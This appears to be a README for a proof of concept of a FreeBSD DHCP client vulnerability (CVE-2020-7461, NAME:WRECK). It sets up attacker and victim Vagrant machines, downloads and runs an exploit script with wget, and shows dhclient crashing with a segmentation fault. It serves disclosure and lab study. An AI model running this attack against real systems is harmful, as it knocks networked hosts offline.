PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD
MIT License
PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD
For educational purposes only
This PoC will cause DoS instead of RCE to prevent abuse.
$ cd victim
$ vagrant up
$ cd ..
$ cd attacker
$ vagrant up
$ vagrant ssh
vagrant@vagrant:~$ sudo apt -y update && apt -y install python3 python3-pip
vagrant@vagrant:~$ wget https://raw.githubusercontent.com/knqyf263/CVE-2020-7461/main/poc.py
vagrant@vagrant:~$ python3 poc.py
Sniffing...
Open another terminal
$ cd victim
$ vagrant ssh
vagrant@freebsd:~ % sudo dhclient em1
DHCPREQUEST on em1 to 255.255.255.255 port 67
Invalid forward pointer in DHCP Domain Search option compression.
Segmentation fault
Teppei Fukuda